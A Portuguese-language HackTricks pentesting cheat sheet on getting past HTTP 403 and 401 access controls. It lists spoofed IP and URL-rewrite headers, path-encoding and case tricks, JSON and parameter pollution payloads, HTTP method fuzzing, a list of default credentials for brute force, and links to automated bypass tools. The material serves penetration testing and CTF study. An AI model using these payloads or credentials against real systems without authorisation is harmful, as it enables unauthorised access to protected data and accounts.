10 KiB
Bypasses de 403 e 401
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de cibersegurança? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os PLANOS DE ASSINATURA!
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Adquira o swag oficial do PEASS & HackTricks
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e repositório hacktricks-cloud.
DragonJAR Security Conference é um evento internacional de cibersegurança com mais de uma década que será realizado nos dias 7 e 8 de setembro de 2023 em Bogotá, Colômbia. É um evento de alto conteúdo técnico onde são apresentadas as últimas pesquisas em espanhol que atraem hackers e pesquisadores de todo o mundo.
Registre-se agora no seguinte link e não perca esta grande conferência!:
{% embed url="https://www.dragonjarcon.org/" %}
Fuzzing de Verbos/Métodos HTTP
Tente usar diferentes verbos para acessar o arquivo: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
- Verifique os cabeçalhos de resposta, talvez algumas informações possam ser fornecidas. Por exemplo, uma resposta 200 para HEAD com
Content-Length: 55
significa que o verbo HEAD pode acessar as informações. Mas você ainda precisa encontrar uma maneira de extrair essas informações. - Usar um cabeçalho HTTP como
X-HTTP-Method-Override: PUT
pode sobrescrever o verbo usado. - Use o verbo
TRACE
e, se tiver muita sorte, talvez na resposta você possa ver também os cabeçalhos adicionados por proxies intermediários que podem ser úteis.
Fuzzing de Cabeçalhos HTTP
-
Altere o cabeçalho Host para algum valor arbitrário (que funcionou aqui)
-
Tente usar outros User Agents para acessar o recurso.
-
Fuzz de Cabeçalhos HTTP: Tente usar Cabeçalhos de Proxy HTTP, Autenticação HTTP Básica e força bruta NTLM (com algumas combinações apenas) e outras técnicas. Para fazer tudo isso, criei a ferramenta fuzzhttpbypass.
-
X-Originating-IP: 127.0.0.1
-
X-Forwarded-For: 127.0.0.1
-
X-Forwarded: 127.0.0.1
-
Forwarded-For: 127.0.0.1
-
X-Remote-IP: 127.0.0.1
-
X-Remote-Addr: 127.0.0.1
-
X-ProxyUser-Ip: 127.0.0.1
-
X-Original-URL: 127.0.0.1
-
Client-IP: 127.0.0.1
-
True-Client-IP: 127.0.0.1
-
Cluster-Client-IP: 127.0.0.1
-
X-ProxyUser-Ip: 127.0.0.1
-
Host: localhost
Se o caminho estiver protegido, você pode tentar contornar a proteção do caminho usando esses outros cabeçalhos:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
- Se a página estiver atrás de um proxy, talvez seja o proxy que esteja impedindo você de acessar as informações privadas. Tente abusar do HTTP Request Smuggling ou cabeçalhos hop-by-hop.
- Fuzz de cabeçalhos HTTP especiais procurando por respostas diferentes.
- Fuzz de cabeçalhos HTTP especiais enquanto faz o fuzzing de Métodos HTTP.
- Remova o cabeçalho Host e talvez você consiga contornar a proteção.
Fuzzing de Caminho
Se /caminho estiver bloqueado:
- Tente usar /%2e/caminho _(se o acesso estiver bloqueado por um proxy, isso pode contornar a proteção). Tente também_** /%252e**/caminho (codificação dupla de URL)
- Tente bypass Unicode: /%ef%bc%8fcaminho (Os caracteres codificados em URL são como "/"), então quando codificados novamente será //caminho e talvez você já tenha contornado a verificação do nome /caminho
- Outros bypass de caminho:
- site.com/secret –> HTTP 403 Forbidden
- site.com/SECRET –> HTTP 200 OK
- site.com/secret/ –> HTTP 200 OK
- site.com/secret/. –> HTTP 200 OK
- site.com//secret// –> HTTP 200 OK
- site.com/./secret/.. –> HTTP 200 OK
- site.com/;/secret –> HTTP 200 OK
- site.com/.;/secret –> HTTP 200 OK
- site.com//;//secret –> HTTP 200 OK
- site.com/secret.json –> HTTP 200 OK (ruby)
- Use toda esta lista nas seguintes situações:
- /FUZZsecret
- /FUZZ/secret
- /secretFUZZ
- Outros bypass de API:
- /v3/users_data/1234 --> 403 Forbidden
- /v1/users_data/1234 --> 200 OK
- {“id”:111} --> 401 Não autorizado
- {“id”:[111]} --> 200 OK
- {“id”:111} --> 401 Não autorizado
- {“id”:{“id”:111}} --> 200 OK
- {"user_id":"<legit_id>","user_id":"<victims_id>"} (Poluição de Parâmetros JSON)
- user_id=ATTACKER_ID&user_id=VICTIM_ID (Poluição de Parâmetros)
Manipulação de Parâmetros
- Alterar o valor do parâmetro: De
id=123
-->id=124
- Adicionar parâmetros adicionais à URL:
?
id=124
—->id=124&isAdmin=true
- Remover os parâmetros
- Reordenar os parâmetros
- Usar caracteres especiais.
- Realizar testes de limite nos parâmetros - fornecer valores como -234 ou 0 ou 99999999 (apenas alguns exemplos de valores).
Versão do Protocolo
Se estiver usando HTTP/1.1, tente usar 1.0 ou até mesmo testar se suporta 2.0.
Outros Bypasses
- Obtenha o IP ou CNAME do domínio e tente contatá-lo diretamente.
- Tente sobrecarregar o servidor enviando solicitações GET comuns (Funcionou para esse cara com o Facebook).
- Alterar o protocolo: de http para https, ou de https para http
- Acesse https://archive.org/web/ e verifique se no passado esse arquivo estava acessível em todo o mundo.
Força Bruta
- Adivinhe a senha: Teste as seguintes credenciais comuns. Você sabe algo sobre a vítima? Ou o nome do desafio CTF?
- Força Bruta: Tente autenticação básica, digest e NTLM.
{% code title="Credenciais comuns" %}
admin admin
admin password
admin 1234
admin admin1234
admin 123456
root toor
test test
guest guest
{% endcode %}
Ferramentas Automáticas
- https://github.com/lobuhi/byp4xx
- https://github.com/iamj0ker/bypass-403
- https://github.com/gotr00t0day/forbiddenpass
- Extensão Burp - 403 Bypasser
DragonJAR Security Conference é um evento internacional de cibersegurança com mais de uma década que será realizado nos dias 7 e 8 de setembro de 2023 em Bogotá, Colômbia. É um evento de alto conteúdo técnico onde são apresentadas as últimas pesquisas em espanhol que atraem hackers e pesquisadores de todo o mundo.
Registre-se agora no seguinte link e não perca esta grande conferência!:
{% embed url="https://www.dragonjarcon.org/" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de cibersegurança? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os PLANOS DE ASSINATURA!
- Descubra The PEASS Family, nossa coleção exclusiva de NFTs
- Adquira o swag oficial do PEASS & HackTricks
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para o repositório hacktricks e repositório hacktricks-cloud.